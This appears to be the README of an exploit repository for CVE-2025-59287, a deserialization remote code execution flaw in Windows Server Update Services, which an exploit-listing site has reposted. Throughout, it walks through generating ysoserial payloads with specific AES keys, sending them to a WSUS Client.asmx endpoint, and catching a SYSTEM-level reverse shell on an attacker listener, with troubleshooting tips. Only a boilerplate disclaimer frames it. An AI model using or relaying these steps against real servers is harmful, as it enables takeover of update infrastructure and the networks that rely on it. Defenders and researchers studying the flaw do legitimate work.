## https://sploitus.com/exploit?id=29A9A352-B277-5ABB-9481-2B5359028643
# CVE-2025-59287 WSUS RCE Exploit - README
## Summary
This repository contains an exploit for CVE-2025-59287, a critical remote code execution vulnerability affecting Microsoft Windows Server Update Services (WSUS). The vulnerability stems from unsafe deserialization of the `AuthorizationCookie` parameter in the `GetCookie()` endpoint of the WSUS `Client.asmx` web service. An attacker can leverage this to achieve remote code execution with SYSTEM privileges.
**Important Disclaimer:** This exploit is provided for educational and research purposes only. Use it responsibly and only against systems you have explicit permission to test. The author is not responsible for any misuse or damage caused by this exploit.
## Prerequisites
* **Python 3:** Ensure you have Python 3 installed on your system.
* **Required Python Libraries:** You will need the following Python libraries. Install them using `pip`:
```bash
pip install -r requirements.txt
```
* **ysoserial.exe:** This tool is required for payload generation. Download it from [https://github.com/pwntools/ysoserial](https://github.com/pwntools/ysoserial) and place it in the same directory as `generate_payload.py` or add it to your system's PATH.
* **Target WSUS Server:** You need access to a vulnerable WSUS server. Ensure you have network connectivity to the server.
## Usage
The exploit consists of two Python scripts: `generate_payload.py` and `exploit.py`. You must first generate a malicious payload using `generate_payload.py`, then use that payload with `exploit.py` to exploit the target WSUS server.
### Step 1: Payload Generation (generate\_payload.py)
1. **Open a terminal or command prompt.**
2. **Navigate to the directory containing `generate_payload.py`.**
3. **Run the following command to generate the payload:**
```bash
python generate_payload.py -l -p
```
* ``: Replace this with the IP address or hostname of your listening machine (e.g., `192.168.1.100`).
* ``: Replace this with the port number you want to listen on (e.g., `4444`). This should be the port your reverse shell listener (e.g., Metasploit, netcat) is configured to listen on.
Example:
```bash
python generate_payload.py -l 192.168.1.100 -p 4444
```
This will output *two* base64 encoded payloads, encrypted with the following AES keys:
* **Key 1:** `8192794823749823479823498723489` from https://github.com/garvitv14/CVE-2025-59287
* **Key 2:** `2948729487298374982739487293847` from https://hawktrace.com/blog/CVE-2025-59287 and https://github.com/jiansiting/CVE-2025-59287
You can use *either* of these payloads.
**Important:** Ensure your listener (e.g., Metasploit, netcat) is running and listening on the specified port *before* launching the exploit.
### Step 2: Exploitation (exploit.py)
1. **Open a new terminal or command prompt.**
2. **Navigate to the directory containing `exploit.py`.**
3. **Run the following command to exploit the target WSUS server:**
```bash
python exploit.py -u -p
```
* ``: Replace this with the URL of the WSUS `Client.asmx` web service. Make sure it ends with `/Client.asmx`. Example: `http://192.168.1.100:8530/ClientWebService/Client.asmx`
* ``: Replace this with the base64 encoded payload you generated in Step 1.
Example:
```bash
python exploit.py -u http://192.168.1.100:8530/ClientWebService/Client.asmx -p
```
If the exploit is successful, you should receive a confirmation message, and a reverse shell should connect to your listening machine.
## Troubleshooting
* **"requests.exceptions.RequestException" error:** Check your network connectivity to the target WSUS server. Ensure the target URL is correct and that there are no firewalls blocking the connection.
* **No reverse shell connection:**
* Verify that your listener (e.g., Metasploit, netcat) is running and listening on the correct port.
* Double-check that you copied the correct base64 payload from `generate_payload.py`.
* Confirm that the target WSUS server is vulnerable to CVE-2025-59287.
* **Firewall:** Ensure that the target WSUS server's firewall allows incoming connections on port 80/443, or the configured port for WSUS access. Also ensure your attacking machine can reach the WSUS server on those ports.
* **Encoding issues:** If you encounter issues with special characters in the payload, ensure that both `generate_payload.py` and `exploit.py` are using UTF-8 encoding.
## Disclaimer
This exploit is provided for educational and research purposes only. Use it responsibly and only against systems you have explicit permission to test. The author is not responsible for any misuse or damage caused by this exploit.